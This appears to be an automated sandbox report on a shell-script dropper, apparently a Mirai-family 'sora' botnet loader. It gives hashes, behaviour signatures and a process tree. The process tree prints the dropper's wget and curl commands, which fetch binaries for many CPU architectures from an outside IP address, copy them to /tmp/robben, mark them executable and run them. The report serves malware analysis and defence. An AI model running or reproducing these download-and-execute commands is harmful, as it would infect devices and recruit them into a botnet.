Analysis
-
max time kernel
85s -
max time network
88s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
-
Size
2KB
-
MD5
5d873bf46fd4ff411eb17e42d5ae2980
-
SHA1
fd73b1bb3b7241d68fcaac4f4bf9cc6164b6fa06
-
SHA256
7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d
-
SHA512
f58f94eaa5f9440db6b1c41915be89331d7355904631d3ede46adfd517e493b3e49979d0ad0a535d8d6181ac81e0d19d6ba0dcb33765b54bbc16830828cc6382
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 797 chmod 861 chmod 776 chmod 729 chmod 750 chmod 867 chmod 717 chmod 855 chmod 879 chmod 819 chmod 741 chmod 762 chmod 873 chmod 735 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 719 robben /tmp/robben 730 robben /tmp/robben 736 robben /tmp/robben 742 robben /tmp/robben 751 robben /tmp/robben 763 robben /tmp/robben 778 robben /tmp/robben 800 robben /tmp/robben 820 robben /tmp/robben 856 robben /tmp/robben 862 robben /tmp/robben 868 robben /tmp/robben 874 robben /tmp/robben 880 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 721 wget 724 curl 727 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
Processes
-
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh1⤵
- Writes file to tmp directory
PID:692 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:696
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:705
-
-
/bin/catcat sora.x862⤵PID:716
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:719
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:721
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:724
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:727
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:730
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:732
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:733
-
-
/bin/catcat sora.x86_642⤵PID:734
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:738
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:739
-
-
/bin/catcat sora.i4682⤵PID:740
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:744
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:745
-
-
/bin/catcat sora.i6862⤵PID:749
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:753
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:754
-
-
/bin/catcat sora.mpsl2⤵PID:761
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:763
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:766
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:769
-
-
/bin/catcat sora.arm42⤵PID:775
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:778
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:781
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:789
-
-
/bin/catcat sora.arm52⤵PID:795
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:802
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:813
-
-
/bin/catcat sora.arm62⤵PID:818
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:822
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:823
-
-
/bin/catcat sora.arm72⤵PID:854
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:858
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:859
-
-
/bin/catcat sora.ppc2⤵PID:860
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:862
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:864
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:865
-
-
/bin/catcat sora.ppc440fp2⤵PID:866
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:868
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:870
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:871
-
-
/bin/catcat sora.m68k2⤵PID:872
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:874
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:876
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:877
-
-
/bin/catcat sora.sh42⤵PID:878
-
-
/bin/chmodchmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:880
-